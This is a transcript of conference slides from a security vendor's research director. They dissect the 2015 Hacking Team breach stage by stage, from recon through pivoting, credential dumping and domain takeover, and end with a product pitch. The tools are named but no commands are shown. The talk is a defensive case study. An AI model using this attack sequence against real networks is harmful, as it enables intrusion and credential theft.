threat dissection - alberto soliño testa research director, core security
TRANSCRIPT
THREAT DISSECTION
L E A R N M O R E
Alberto G. SolinoDirector Of Research, Core Security
Geek me• Microsoft ASM first programming language (by luck)• Starting playing with MS-‐DOS viruses when I was 10• Hooked into a security research group at BA University when I was 15• Special Projects Security Group for Arg. Tax Agency • Joined Core as security consultant• Managed the Security Consulting Team for 11 years• Switched to PM (Core Impact) for 5+ years• Now Director of Research J
Not so geek mePiano, tennis, scuba diving and skydiving (above all). Surfing in the ToDo list.
Some big software fails and their consequences
MS08-‐067
MS14-‐068
MS10-‐067 + MS10-‐046
Hacking Team Hack
• Founded in 2003.• Develop and sells hacking tools to governments.• Remote Control System (a.k.a. Galileo) is their main solution.
• In July 2015, Hacking Team was hacked. • Hacked dump available at https://github.com/hackedteam.• Includes RCS for Linux, Android, the common backend and a set of exploits (some
of them 0-‐day back then).• Emails dumped available through Wikileaks at
https://wikileaks.org/hackingteam/emails/.• Full dump (~400Gb) released as torrent.• Hack claimed to be done by Phineas Fisher.
Hacking Team Hack – Step 1
Initial Information Gathering / Recon:• Whois lookups• OS stack fingerprinting• Port Scanning• Web Application Fingerprinting
Results:• Main WebSite (Joomla)• Mail/AntiSpam Server (PostFix)• VPN Appliances (embedded)
External Recon
Hacking Team Hack – Step 2
Initial Foothold• No phishing / client side• 0-‐day in embedded device
Uploaded toolkit• Python• Nmap• Responder.py• Tcpdump• Socat• SOCKS proxy (proxychains)
Pivoting
Compromised Machine
Hacking Team Hack – Step 3
Internal Information Gathering:• Traffic analysis (w/Responder)• Slow port scan• OS Fingerprinting
Results:• MySQL databases (patched)• Opened MongoDB w/o authentication (RCS Audio records)• iSCSI Devices w/o authentication (for backups)
Internal Recon
Hacking Team Hack – Step 4
Local Privilege Escalation:• iSCSI remote mount (Exchange VM backup)• Registry hives download.• Dump registry secrets (lsadump, creddump
secretsdump, etc)
Results:• Local Administrator account (besadmin) plaintext password in service
Privilege Escalation
Compromised Creds.
Hacking Team Hack – Step 5
Pivoting / RCE /Compromise Creds :• Using besadmin to log into servers• Install Meterpreter agent.• Scrape memory for creds (mimikatz)
RCE Pivoting Local IG (Creds)
Hacking Team Hack – Step 5b
Results:
Domain Admin Creds
Domain Dominance
Hacking Team Hack – Step 6
Local IG / Exploit / Pivoting :• Mounting Truecrypt volume.• Text file pointing to Nagios Server creds.• OS Command Injection in WebApps.• Nagios connected to source code network.
Result:• Access to source code network as admin.
Local IG
Pivoting
Exploit / RCE
Hacking Team Hack – Conclusions
Data Exfiltration / Persistence:• Method unknown (probably just TCP)• No persistence set (Duqu style)
Results:• All emails• Source code for most applications• Company’s Twitter account
Persistence
Data Exfiltration
High level cycle of a compromise
https://blogs.technet.microsoft.com/enterprisemobility/2017/01/24/cyber-‐security-‐attackers-‐toolkit-‐what-‐you-‐need-‐to-‐know/
Core Security Solutions
Core Impact – Pentesting / Red Teaming solution
Multi-‐Threat Surface Investigation
Commercial-‐Grade Framework
Actionable, Customized Reports & Results
Security Awareness & Evidence
Vulnerability Insight -‐ Attack Path Simulation
Identify “Attack Path” • Learning what an attacker can do to your network today• Identifying dangerous trust relationships between components
Remove false positives and less relevant vulnerabilities
Network Insight
Access Insight
VULNERABILITIES & ATTACK PATHFOR INFECTED DEVICES
SUSPECTED & INFECTED HOST INFORMATION
NetworkInsight
VulnerabilityInsight
AccessInsight
ACTIONABLE INSIGHT
& RESPONSE
AIR
Putting it all together